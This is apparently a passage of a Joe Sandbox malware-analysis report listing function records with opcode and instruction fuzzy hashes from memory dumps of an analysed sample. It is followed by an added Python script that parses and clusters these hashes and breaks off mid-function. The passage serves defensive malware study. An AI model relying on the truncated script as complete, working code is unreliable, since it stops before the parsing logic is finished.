• Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b459584b93f7e168f3974a90a9fdcd5e2033c8d2170d1d6524bebf22ccd9380c
                                                                                    • Instruction ID: 3d1e32400da0cdcbcc2053b971a70fe921c04859ace6453701da99bb7ff095c5
                                                                                    • Opcode Fuzzy Hash: b459584b93f7e168f3974a90a9fdcd5e2033c8d2170d1d6524bebf22ccd9380c
                                                                                    • Instruction Fuzzy Hash: 52C18174E01218CFEB54DFA5C954B9DBBB2FF89300F1081A9D409AB3A5DB359A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee3890a6431ca8176590c65dfd05eca4a68a72d18490a2ceb8f294b7b0e6128a
                                                                                    • Instruction ID: 1832d4ea48e4e00a9ba2ac4d88c7591cc7b1b4d2f663775b3953e161e1035e8f
                                                                                    • Opcode Fuzzy Hash: ee3890a6431ca8176590c65dfd05eca4a68a72d18490a2ceb8f294b7b0e6128a
                                                                                    • Instruction Fuzzy Hash: CFC18274E00218CFEB54DFA5C954B9DBBB2EF89300F1081A9D409AB3A5DB355E85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ee4e9c310c4aac1398d88174aba2de5290b632d8b960b8a32db5747d54e1c557
                                                                                    • Instruction ID: 59554d83f9df5c875f759d066463a4a3e465364866115d2dab79d764bea59af9
                                                                                    • Opcode Fuzzy Hash: ee4e9c310c4aac1398d88174aba2de5290b632d8b960b8a32db5747d54e1c557
                                                                                    • Instruction Fuzzy Hash: 2BC18174E00218CFEB54DFA5C954B9DBBB2FF89300F1081A9D419AB3A5DB359A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: de5f021db9ecdfa53f63d2ab2fcda8ab3ce84f2c14adcb492eb1170450f17b8e
                                                                                    • Instruction ID: 3acfad40dc67bc981141c72e89ac76387d488554c4c35e551ffe2f304b798027
                                                                                    • Opcode Fuzzy Hash: de5f021db9ecdfa53f63d2ab2fcda8ab3ce84f2c14adcb492eb1170450f17b8e
                                                                                    • Instruction Fuzzy Hash: B6C19274E01218CFEB54DFA5C954B9DBBB2FF89300F2081A9D409AB3A5DB355A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 972a9491ddc96d112c37d6df036f509d57db16f7f6622a0a3377d421e1757cbb
                                                                                    • Instruction ID: 24997d69abb9b94dfe851e094e76ded1b1c6faec63e6aa00364fb85f4b538c3d
                                                                                    • Opcode Fuzzy Hash: 972a9491ddc96d112c37d6df036f509d57db16f7f6622a0a3377d421e1757cbb
                                                                                    • Instruction Fuzzy Hash: 52C19174E01218CFEB54DFA5C954B9DBBB2FF89300F1081A9D409AB3A5DB359A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 05f568c018610a4bb1b17b0984c603fd0ad39facc590a6b4a81e83f2cdc4702f
                                                                                    • Instruction ID: 82ab6b466d7f00b8e6fe5a6df3a5ceb327e25b2986696529f53609fc98af4232
                                                                                    • Opcode Fuzzy Hash: 05f568c018610a4bb1b17b0984c603fd0ad39facc590a6b4a81e83f2cdc4702f
                                                                                    • Instruction Fuzzy Hash: 3BC18174E00218CFEB54DFA5C954B9DBBB2FF89300F1081A9D419AB3A5DB359A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 71e571f889ccb40ff4c00818b033c5a5d35db5df895306869c3285ea11d5736f
                                                                                    • Instruction ID: 49da00d4f92646e2796e3949ec8ed716365d00fa0289187c8d15a75b6b7ca3d0
                                                                                    • Opcode Fuzzy Hash: 71e571f889ccb40ff4c00818b033c5a5d35db5df895306869c3285ea11d5736f
                                                                                    • Instruction Fuzzy Hash: C3C1A174E00218CFEB55DFA5C954B9DBBB2EF89300F1081A9D409AB3A5DB359A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 79a9dbb5d8a93b6119830013e97c546ac81e0a89fd53c41571b8eb28ecb8c9bc
                                                                                    • Instruction ID: c1408598c2ddb7b37917a9e8a03cbaf4485aae9cdb12d1d4d7ec11514c598fdf
                                                                                    • Opcode Fuzzy Hash: 79a9dbb5d8a93b6119830013e97c546ac81e0a89fd53c41571b8eb28ecb8c9bc
                                                                                    • Instruction Fuzzy Hash: 4EC19174E00218CFEB54DFA5C954B9DBBB2EF89300F1081A9D419AB3A5DB359A85CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c41286b6422ce1c76ab4be0e6f489f058198c837a461fe02c855e64a8cd59c26
                                                                                    • Instruction ID: 4955200a9ecc6cfef01b96b4aee2233a643f4c499119cbd35a3c9928a0436df9
                                                                                    • Opcode Fuzzy Hash: c41286b6422ce1c76ab4be0e6f489f058198c837a461fe02c855e64a8cd59c26
                                                                                    • Instruction Fuzzy Hash: 67A12575D10619DEEB14DFA9C8447ADFBF1EF89300F10C2AAE448A7265EB709A81CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2fdc1f90e69dcaa6c5174ff5487ed5a18706b5ed6f9d2bfb75f632b8b7a062e2
                                                                                    • Instruction ID: 5684f20f7604d42a4b33287d1ebebd8b48b5a79b7343f5bed0547a591fccd858
                                                                                    • Opcode Fuzzy Hash: 2fdc1f90e69dcaa6c5174ff5487ed5a18706b5ed6f9d2bfb75f632b8b7a062e2
                                                                                    • Instruction Fuzzy Hash: E4A19E74E01228CFEB65DF24C854BA9BBB2BF89311F1085EAD409A7390DB319E81CF51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: be469af6dec1479ffc799efec9b2b0515a68b26ae0c4d9bd6b5e2f04570ed257
                                                                                    • Instruction ID: f9e3ee94c9827e1f724278d91629860a13d18f0196ce6fa2682ee56fc018264f
                                                                                    • Opcode Fuzzy Hash: be469af6dec1479ffc799efec9b2b0515a68b26ae0c4d9bd6b5e2f04570ed257
                                                                                    • Instruction Fuzzy Hash: 4B519374A05228CFDB65DF24C854BA9B7B2FF4A311F5095E9D40AA7364CB319E81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bc63f3ac9f038f0cb6d53765e12c2952743492c564cf2c81d7ab9bde8a1759ed
                                                                                    • Instruction ID: 696f2e417bf851253d17fe6eb464fa58c8d3e5846417c82b390ff5dea2469623
                                                                                    • Opcode Fuzzy Hash: bc63f3ac9f038f0cb6d53765e12c2952743492c564cf2c81d7ab9bde8a1759ed
                                                                                    • Instruction Fuzzy Hash: 79412375D04208CBEB58CFAAD8446AEFBF2AF88300F20C029C018BB294DB345946CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13f32640140d6533b723dec78791c28e23ee74d3fc6c629789818ac5cb24c493
                                                                                    • Instruction ID: c860b0911aa37f0c1135a8037fff9d98cf6e64301b17c9815e63926a26c44c8a
                                                                                    • Opcode Fuzzy Hash: 13f32640140d6533b723dec78791c28e23ee74d3fc6c629789818ac5cb24c493
                                                                                    • Instruction Fuzzy Hash: 6141E4B5D00208CBEB58DFAAD9546EEBBF2AF89300F24C129C415BB295DB385945CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 802892ee1137049837e112c53ec8237a2f56a6c9dfc9312ec3638981e7296220
                                                                                    • Instruction ID: f7af15ebd341d62a826b916829b005a735a66b525d4f2094db60b4c88f7ee471
                                                                                    • Opcode Fuzzy Hash: 802892ee1137049837e112c53ec8237a2f56a6c9dfc9312ec3638981e7296220
                                                                                    • Instruction Fuzzy Hash: 75410675E00208CFEB58DFAAD95469EFBF2AF89300F20D529C414BB295EB345946CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 37167b4fb4bdafd2684de3e788a2eb7ac3477d1993e4665627b438e98ed32519
                                                                                    • Instruction ID: 5f59196de4c18f3954663a156ab56ba209dae1615425a566ca3a304a6eba83a6
                                                                                    • Opcode Fuzzy Hash: 37167b4fb4bdafd2684de3e788a2eb7ac3477d1993e4665627b438e98ed32519
                                                                                    • Instruction Fuzzy Hash: F741F775D00248CFEB58DFAAD95469DBBF2AF89300F24C12AC414BB294DB385945CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fded45beacc657185d0c28478c57de487354279a59390e0f9f56279f965faec
                                                                                    • Instruction ID: 7dbeaa54b894e095dd87d0f13ade1fd9041ba53bdcf4a107c6f10a50ffc8611c
                                                                                    • Opcode Fuzzy Hash: 0fded45beacc657185d0c28478c57de487354279a59390e0f9f56279f965faec
                                                                                    • Instruction Fuzzy Hash: C74115B5D01208CFEB58CFAAC95479DBBF2AF89300F64C129C418BB294EB345945CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6edd1dfd6b1c654401fa2e838285ed93324d9e43a8ed3479a1ba9d9bdfde7b51
                                                                                    • Instruction ID: 6d2d685e29315901b9a1bcde5ca686f3300cafc371ad9de5d1672bf67f5ce759
                                                                                    • Opcode Fuzzy Hash: 6edd1dfd6b1c654401fa2e838285ed93324d9e43a8ed3479a1ba9d9bdfde7b51
                                                                                    • Instruction Fuzzy Hash: 81410671D00248CFEB58DFAAD95469DBBF2AF89300F64C129C418BB295DB385946CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c04b3ba731b9d87a27240da44f5241eb89c19d32462761d05f8e8dbc776d81d
                                                                                    • Instruction ID: 884050ecbe74d57904378c4753a6c29e77dca256b62f8978a2ce74d65fc9a9ab
                                                                                    • Opcode Fuzzy Hash: 1c04b3ba731b9d87a27240da44f5241eb89c19d32462761d05f8e8dbc776d81d
                                                                                    • Instruction Fuzzy Hash: 86411475E00208CFEB58DFAAC85469EBBF2AF89300F24C129C415BB294DB345946CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0471414c1a945a70abb1de284eb427dbdbc418bd8355bfc92658299ec00c7f14
                                                                                    • Instruction ID: ae64872418eaa3ddcd61a1ddd3705a3cc44176dde577316e1dd7c54c0d64cc1e
                                                                                    • Opcode Fuzzy Hash: 0471414c1a945a70abb1de284eb427dbdbc418bd8355bfc92658299ec00c7f14
                                                                                    • Instruction Fuzzy Hash: ED41F5B5D01208CFEB58CFAAD9546EDBBF2AF89300F60C12AC415BB295DB355946CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0267d4382ac8ecd90655cbeca65633c9828aee5f07a2063c842389da537c00cc
                                                                                    • Instruction ID: 5de2c8781c27092f53ba67988bf034d60bb93c66db6aee018d8d064b7a2007e7
                                                                                    • Opcode Fuzzy Hash: 0267d4382ac8ecd90655cbeca65633c9828aee5f07a2063c842389da537c00cc
                                                                                    • Instruction Fuzzy Hash: 29410675D05208CFEB58CFEAD9546ADBBF2AF89300F60C12AC418BB294DB345946CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cb8f9d621f0847980c51ee7775b004201f9bbe9650ea616117151dda355f7fa0
                                                                                    • Instruction ID: 053989d90508c528e0635b7ef687ec0494a84a9abbfb90856f599a56d3b5e7db
                                                                                    • Opcode Fuzzy Hash: cb8f9d621f0847980c51ee7775b004201f9bbe9650ea616117151dda355f7fa0
                                                                                    • Instruction Fuzzy Hash: 0A411371E00208DFEB58DFAAC8547ADBBF2AF89300F64C529D418BB294DB345946CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c35afbf81453f6073d401c5b9ca515c1c41b7258cd5e833c7bbd72d3b317e8a1
                                                                                    • Instruction ID: 68ff7a7c121f713a4adb261293a29d580bec91d602323891a156de2ab5b02302
                                                                                    • Opcode Fuzzy Hash: c35afbf81453f6073d401c5b9ca515c1c41b7258cd5e833c7bbd72d3b317e8a1
                                                                                    • Instruction Fuzzy Hash: 8E4106B1D00208DBEB58DFAAC85479DFBF2AF89300F64C129C414BB294DB385946CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ace5d69a0efc7d541ec91d8149fc2099447e004bb027bbf89abfca57d214fba
                                                                                    • Instruction ID: d9b8fd67c48854dfa20d9eede980e2c6cde3965a3c21e861d5a830604fe04897
                                                                                    • Opcode Fuzzy Hash: 6ace5d69a0efc7d541ec91d8149fc2099447e004bb027bbf89abfca57d214fba
                                                                                    • Instruction Fuzzy Hash: 4941E275E00208CFEB58DFEAD95469DBBF2AF89300F24D029D418AB295DB345945CF60
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ae99c4114c8cbf8e921e93b8c35a5148a382b28fcb109ae27976e11953a4e2e
                                                                                    • Instruction ID: b11bfa4ad4b150243333013b01a5f8dcaf28c8751c0a7dd4e893f57b6a140f52
                                                                                    • Opcode Fuzzy Hash: 5ae99c4114c8cbf8e921e93b8c35a5148a382b28fcb109ae27976e11953a4e2e
                                                                                    • Instruction Fuzzy Hash: B641D374D05208CFEB58DFAAD9546AEBBF2AF89300F20C129C419BB295DB345946CF64
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6ce1106064b34ba2aaee6d8357aac3b66f24eb35c687e777da4dcf0b9cd0ca48
                                                                                    • Instruction ID: af663eb0a322445510c743dde8ac2b79b281d0581fa85528cb48c69db5f5a815
                                                                                    • Opcode Fuzzy Hash: 6ce1106064b34ba2aaee6d8357aac3b66f24eb35c687e777da4dcf0b9cd0ca48
                                                                                    • Instruction Fuzzy Hash: 6041E274D01208CFEB58DFEAD9546AEBBF2AF89300F20C129C419BB294DB345945CF64
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Xq$Xq$Xq$Xq
                                                                                    • API String ID: 0-3965792415
                                                                                    • Opcode ID: 4eb1561516d6da002584bade946373a8d6aa4ecb810ca7c6242f9c1ba8c6ef0c
                                                                                    • Instruction ID: 5ab6d0d4a788566be7e69ad1268bd6c49459100bdc11a1f0cf55f75d463e105d
                                                                                    • Opcode Fuzzy Hash: 4eb1561516d6da002584bade946373a8d6aa4ecb810ca7c6242f9c1ba8c6ef0c
                                                                                    • Instruction Fuzzy Hash: 20319630D003198BDF74CBA48A81BAEB7B6AB94304F14516DC519B7341DB32CE47CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \;q$\;q$\;q$\;q
                                                                                    • API String ID: 0-2933265366
                                                                                    • Opcode ID: d2a829f085e61e1290d108f32ed70d568d196787903eeae00b9951171d12b7e7
                                                                                    • Instruction ID: 3cddfc8f2bb0164329b05b8c5f1b242e3de71ece15c7192326dca61b9ad25622
                                                                                    • Opcode Fuzzy Hash: d2a829f085e61e1290d108f32ed70d568d196787903eeae00b9951171d12b7e7
                                                                                    • Instruction Fuzzy Hash: 1B0184317001158FC7248A2DC640F2777E6AFC8768729616EE806EB370DA32EC438751
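The function records above follow one fixed layout (a `Memory Dump Source` header, then `•`-prefixed key/value fields), and the nine records from the 0x06700000 dump carry Instruction Fuzzy Hashes that differ in only a handful of hex digits. The following Python script is an added example, not code from Joe Sandbox or from the report: it parses records in this layout, groups them by dump offset, and clusters functions whose Instruction Fuzzy Hashes agree at most positions. The sample input is three records copied from this section. Two things are assumptions made here: that multiple values in the `API ID` / `String ID` fields are joined with `$` (as `Xq$Xq$Xq$Xq` suggests), and that position-wise hex-digit equality is a usable similarity for equal-length Instruction Fuzzy Hashes; that metric is this example's own, not the report's `Similarity` field.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Three function records copied verbatim from the report section above
# (two from the 0x06700000 dump, one from the 0x00EC0000 dump).
SAMPLE_REPORT = """
Memory Dump Source
• Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c04b3ba731b9d87a27240da44f5241eb89c19d32462761d05f8e8dbc776d81d
• Instruction ID: 884050ecbe74d57904378c4753a6c29e77dca256b62f8978a2ce74d65fc9a9ab
• Opcode Fuzzy Hash: 1c04b3ba731b9d87a27240da44f5241eb89c19d32462761d05f8e8dbc776d81d
• Instruction Fuzzy Hash: 86411475E00208CFEB58DFAAC85469EBBF2AF89300F24C129C415BB294DB345946CF60
Memory Dump Source
• Source File: 00000000.00000002.1514052632.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6700000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0471414c1a945a70abb1de284eb427dbdbc418bd8355bfc92658299ec00c7f14
• Instruction ID: ae64872418eaa3ddcd61a1ddd3705a3cc44176dde577316e1dd7c54c0d64cc1e
• Opcode Fuzzy Hash: 0471414c1a945a70abb1de284eb427dbdbc418bd8355bfc92658299ec00c7f14
• Instruction Fuzzy Hash: ED41F5B5D01208CFEB58CFAAD9546EDBBF2AF89300F60C12AC415BB295DB355946CF60
Strings
Memory Dump Source
• Source File: 00000000.00000002.1509900733.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb67816892.jbxd
Similarity
• API ID:
• String ID: Xq$Xq$Xq$Xq
• API String ID: 0-3965792415
• Opcode ID: 4eb1561516d6da002584bade946373a8d6aa4ecb810ca7c6242f9c1ba8c6ef0c
• Instruction ID: 5ab6d0d4a788566be7e69ad1268bd6c49459100bdc11a1f0cf55f75d463e105d
• Opcode Fuzzy Hash: 4eb1561516d6da002584bade946373a8d6aa4ecb810ca7c6242f9c1ba8c6ef0c
• Instruction Fuzzy Hash: 20319630D003198BDF74CBA48A81BAEB7B6AB94304F14516DC519B7341DB32CE47CB92
"""

# A field line in the report: "• Key: value" (value may be empty).
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")


@dataclass
class FunctionRecord:
    source_file: str = ""
    offset: str = ""
    api_ids: list = field(default_factory=list)     # assumed "$"-separated
    string_ids: list = field(default_factory=list)  # assumed "$"-separated
    opcode_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""


def parse_records(text):
    """One FunctionRecord per 'Memory Dump Source' block; other headers are skipped."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
            continue
        m = FIELD_RE.match(line) if cur else None
        if not m:
            continue  # "Strings", "Similarity", "Joe Sandbox IDA Plugin", blanks
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "Source File":
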